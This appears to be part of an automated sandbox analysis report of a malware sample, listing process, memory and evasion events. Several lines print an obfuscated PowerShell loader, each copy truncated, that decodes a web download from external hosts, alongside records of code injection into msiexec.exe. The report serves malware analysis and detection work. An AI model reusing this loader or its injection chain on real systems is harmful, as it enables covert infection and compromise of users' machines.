      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\System32\PING.EXELast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $;r$Hyper-V Time Synchronization Service
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $;r$Hyper-V Volume Shadow Copy Requestor
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicshutdown Hyper-V Guest Shutdown Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicheartbeat Hyper-V Heartbeat Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicvmsession Hyper-V PowerShell Direct Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Remote Desktop Virtualizati...
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicrdv Hyper-V Remote Desktop Virtualizati...
      Source: svchost.exe, 00000009.00000002.2339166678.0000019942859000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2337521153.000001993D22B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicguestinterface Hyper-V Guest Service Interface
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #Hyper-V Remote Desktop Virtualizati
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Guest Shutdown Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Guest Service Interface
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $;r-Hyper-V Remote Desktop Virtualization Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: powershell.exe, 00000004.00000002.1155363014.000001AFFE170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Heartbeat Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V PowerShell Direct Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Data Exchange Service
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $;r!Hyper-V PowerShell Direct Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmictimesync Hyper-V Time Synchronization Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Stopped vmicvss
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicvss Hyper-V Volume Shadow Copy Requestor
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmickvpexchange Hyper-V Data Exchange Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Volume Shadow Copy Requestor
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Time Synchronization Service
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3CD0000Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "get-service;$philologer='func';get-history;$philologer+='t';get-history;$philologer+='i';$stttevvenes=get-history;$philologer+='on:';$stttevvenes=get-history;(ni -p $philologer -n emissionskursers -value { param($flavourfully);$modstillingens=6;do {$metallographically+=$flavourfully[$modstillingens];$modstillingens+=7} until(!$flavourfully[$modstillingens])$metallographically});(ni -p $philologer -n meyers -value {param($gestikulerende);.($hjlpelsestes) ($gestikulerende)});convertto-html;$unlaboring=emissionskursers 'maanednwro,gierapturtust la.embersw';$unlaboring+=emissionskursers ' ghe tehhvsysbmodstacslightlrykke is.lvove transnuvir,et';$splser=emissionskursers 'revalimrappegoheliorzho,fbeiregteulsedestloverasapred.c/';$tilbindes=emissionskursers 'frenesta arthlecuadosreg,on1 holly2';$xenon='sahari[zigge,n andepebruu stunpriv.ceylonsdealmaesignifrdisembvafmaaliafsondcheuvelekomm.nppalladoudskivisprednnfairl tforsulmakkordade imanmobilialb.inggoverheeje aldrkerne.]myster:sikk r:svejtssenfeebe ilsacpostkauerythrrd.zzieihelmedttwankmyinvtunpre.ksar noninosubgovt nmesmot ldvscepideros.xtanl tphst=endowm$ ec esttot eni anisolinsultb rugerib aujon afhend ej ndekara ts';$splser+=emissionskursers 'lainer5lystba.tr.mas0centra polyba(abysmtw smarti stivnskur.adafhoppohus arwtufstestnds i .ootdankldedrtmeroga chelon1f reca0diammi.forbru0kurede;transp prospew buskpitryksandroum.6indfle4bag,li;glycer susc.px ingm6 g ran4sh ysi;succul samfunrprespavnazifi:se isa1mellem3jarbot4inter .idioch0 yperf) voter in arbgakkompehitheoc unsankportliotskede/grimac2bidd t0collar1wor.le0ov rbr0macken1murder0eccles1molli .parlafbandaiiscandirsimulteunwilffspringo spankxdendri/larees1ove,be3auricu4subaci.seizu,0';$garcon72=emissionskursers 'circumu eceles likket,enstrkabe l-unconfabekrangk.sserepipefinchapout';$autogiro=emissionskursers ' pro,th vir etarvef toverstpnabobisordina:benefi/ objec/ afta.komegnsa mi tersprjteu orepon pretiafu ktivmorbi.raftalei enco.kmuch oshematohcaravaaekspon. con uo checkrmetallggarder/quilk i one.em mu tiahelvetgreagiceapo.tasstorag/ste nficorpornaftrapnbe oyao afvrgcj dingeumlautnbourg c .esube nonde.marskamarts,lsraglanopiassa>sortiehsublimt pleurt tinc p mpede:levned/bescra/d wnloachola.lmaaleshfotostablotttlnephroabagloklunciv,a ulils attenioccamia helbr.sonateo frimrrpla.ssgunmora/ denias endrgeflewspafattilrou,voicaftenshmerge /mi iciiwalisen mashrnunfrozolegi ncnonth.eprefernreauthcdet cherntgen.threapmhoftehsfritimo';$blokregistreringerne=emissionskursers ' aari,>';$hjlpelsestes=emissionskursers ' frysei nonimeultratx';$radiata='gennemkre';$bevbne='\motorgadens.alb';meyers (emissionskursers 'kro.us$ nglevglicanslfrilufobo fribgio ita dekl.ltakk l:ult aiabindebnrenipua prelan san,basursumskreditenonv,srbedstenhvssese udp ssbortkr=af eud$scle,oeargusbnforgrev oenol: paa.ia homo p ntermp,uperad ta tfapreflat a g
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "get-service;$philologer='func';get-history;$philologer+='t';get-history;$philologer+='i';$stttevvenes=get-history;$philologer+='on:';$stttevvenes=get-history;(ni -p $philologer -n emissionskursers -value { param($flavourfully);$modstillingens=6;do {$metallographically+=$flavourfully[$modstillingens];$modstillingens+=7} until(!$flavourfully[$modstillingens])$metallographically});(ni -p $philologer -n meyers -value {param($gestikulerende);.($hjlpelsestes) ($gestikulerende)});convertto-html;$unlaboring=emissionskursers 'maanednwro,gierapturtust la.embersw';$unlaboring+=emissionskursers ' ghe tehhvsysbmodstacslightlrykke is.lvove transnuvir,et';$splser=emissionskursers 'revalimrappegoheliorzho,fbeiregteulsedestloverasapred.c/';$tilbindes=emissionskursers 'frenesta arthlecuadosreg,on1 holly2';$xenon='sahari[zigge,n andepebruu stunpriv.ceylonsdealmaesignifrdisembvafmaaliafsondcheuvelekomm.nppalladoudskivisprednnfairl tforsulmakkordade imanmobilialb.inggoverheeje aldrkerne.]myster:sikk r:svejtssenfeebe ilsacpostkauerythrrd.zzieihelmedttwankmyinvtunpre.ksar noninosubgovt nmesmot ldvscepideros.xtanl tphst=endowm$ ec esttot eni anisolinsultb rugerib aujon afhend ej ndekara ts';$splser+=emissionskursers 'lainer5lystba.tr.mas0centra polyba(abysmtw smarti stivnskur.adafhoppohus arwtufstestnds i .ootdankldedrtmeroga chelon1f reca0diammi.forbru0kurede;transp prospew buskpitryksandroum.6indfle4bag,li;glycer susc.px ingm6 g ran4sh ysi;succul samfunrprespavnazifi:se isa1mellem3jarbot4inter .idioch0 yperf) voter in arbgakkompehitheoc unsankportliotskede/grimac2bidd t0collar1wor.le0ov rbr0macken1murder0eccles1molli .parlafbandaiiscandirsimulteunwilffspringo spankxdendri/larees1ove,be3auricu4subaci.seizu,0';$garcon72=emissionskursers 'circumu eceles likket,enstrkabe l-unconfabekrangk.sserepipefinchapout';$autogiro=emissionskursers ' pro,th vir etarvef toverstpnabobisordina:benefi/ objec/ afta.komegnsa mi tersprjteu orepon pretiafu ktivmorbi.raftalei enco.kmuch oshematohcaravaaekspon. con uo checkrmetallggarder/quilk i one.em mu tiahelvetgreagiceapo.tasstorag/ste nficorpornaftrapnbe oyao afvrgcj dingeumlautnbourg c .esube nonde.marskamarts,lsraglanopiassa>sortiehsublimt pleurt tinc p mpede:levned/bescra/d wnloachola.lmaaleshfotostablotttlnephroabagloklunciv,a ulils attenioccamia helbr.sonateo frimrrpla.ssgunmora/ denias endrgeflewspafattilrou,voicaftenshmerge /mi iciiwalisen mashrnunfrozolegi ncnonth.eprefernreauthcdet cherntgen.threapmhoftehsfritimo';$blokregistreringerne=emissionskursers ' aari,>';$hjlpelsestes=emissionskursers ' frysei nonimeultratx';$radiata='gennemkre';$bevbne='\motorgadens.alb';meyers (emissionskursers 'kro.us$ nglevglicanslfrilufobo fribgio ita dekl.ltakk l:ult aiabindebnrenipua prelan san,basursumskreditenonv,srbedstenhvssese udp ssbortkr=af eud$scle,oeargusbnforgrev oenol: paa.ia homo p ntermp,uperad ta tfapreflat a g
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "get-service;$philologer='func';get-history;$philologer+='t';get-history;$philologer+='i';$stttevvenes=get-history;$philologer+='on:';$stttevvenes=get-history;(ni -p $philologer -n emissionskursers -value { param($flavourfully);$modstillingens=6;do {$metallographically+=$flavourfully[$modstillingens];$modstillingens+=7} until(!$flavourfully[$modstillingens])$metallographically});(ni -p $philologer -n meyers -value {param($gestikulerende);.($hjlpelsestes) ($gestikulerende)});convertto-html;$unlaboring=emissionskursers 'maanednwro,gierapturtust la.embersw';$unlaboring+=emissionskursers ' ghe tehhvsysbmodstacslightlrykke is.lvove transnuvir,et';$splser=emissionskursers 'revalimrappegoheliorzho,fbeiregteulsedestloverasapred.c/';$tilbindes=emissionskursers 'frenesta arthlecuadosreg,on1 holly2';$xenon='sahari[zigge,n andepebruu stunpriv.ceylonsdealmaesignifrdisembvafmaaliafsondcheuvelekomm.nppalladoudskivisprednnfairl tforsulmakkordade imanmobilialb.inggoverheeje aldrkerne.]myster:sikk r:svejtssenfeebe ilsacpostkauerythrrd.zzieihelmedttwankmyinvtunpre.ksar noninosubgovt nmesmot ldvscepideros.xtanl tphst=endowm$ ec esttot eni anisolinsultb rugerib aujon afhend ej ndekara ts';$splser+=emissionskursers 'lainer5lystba.tr.mas0centra polyba(abysmtw smarti stivnskur.adafhoppohus arwtufstestnds i .ootdankldedrtmeroga chelon1f reca0diammi.forbru0kurede;transp prospew buskpitryksandroum.6indfle4bag,li;glycer susc.px ingm6 g ran4sh ysi;succul samfunrprespavnazifi:se isa1mellem3jarbot4inter .idioch0 yperf) voter in arbgakkompehitheoc unsankportliotskede/grimac2bidd t0collar1wor.le0ov rbr0macken1murder0eccles1molli .parlafbandaiiscandirsimulteunwilffspringo spankxdendri/larees1ove,be3auricu4subaci.seizu,0';$garcon72=emissionskursers 'circumu eceles likket,enstrkabe l-unconfabekrangk.sserepipefinchapout';$autogiro=emissionskursers ' pro,th vir etarvef toverstpnabobisordina:benefi/ objec/ afta.komegnsa mi tersprjteu orepon pretiafu ktivmorbi.raftalei enco.kmuch oshematohcaravaaekspon. con uo checkrmetallggarder/quilk i one.em mu tiahelvetgreagiceapo.tasstorag/ste nficorpornaftrapnbe oyao afvrgcj dingeumlautnbourg c .esube nonde.marskamarts,lsraglanopiassa>sortiehsublimt pleurt tinc p mpede:levned/bescra/d wnloachola.lmaaleshfotostablotttlnephroabagloklunciv,a ulils attenioccamia helbr.sonateo frimrrpla.ssgunmora/ denias endrgeflewspafattilrou,voicaftenshmerge /mi iciiwalisen mashrnunfrozolegi ncnonth.eprefernreauthcdet cherntgen.threapmhoftehsfritimo';$blokregistreringerne=emissionskursers ' aari,>';$hjlpelsestes=emissionskursers ' frysei nonimeultratx';$radiata='gennemkre';$bevbne='\motorgadens.alb';meyers (emissionskursers 'kro.us$ nglevglicanslfrilufobo fribgio ita dekl.ltakk l:ult aiabindebnrenipua prelan san,basursumskreditenonv,srbedstenhvssese udp ssbortkr=af eud$scle,oeargusbnforgrev oenol: paa.ia homo p ntermp,uperad ta tfapreflat a gJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
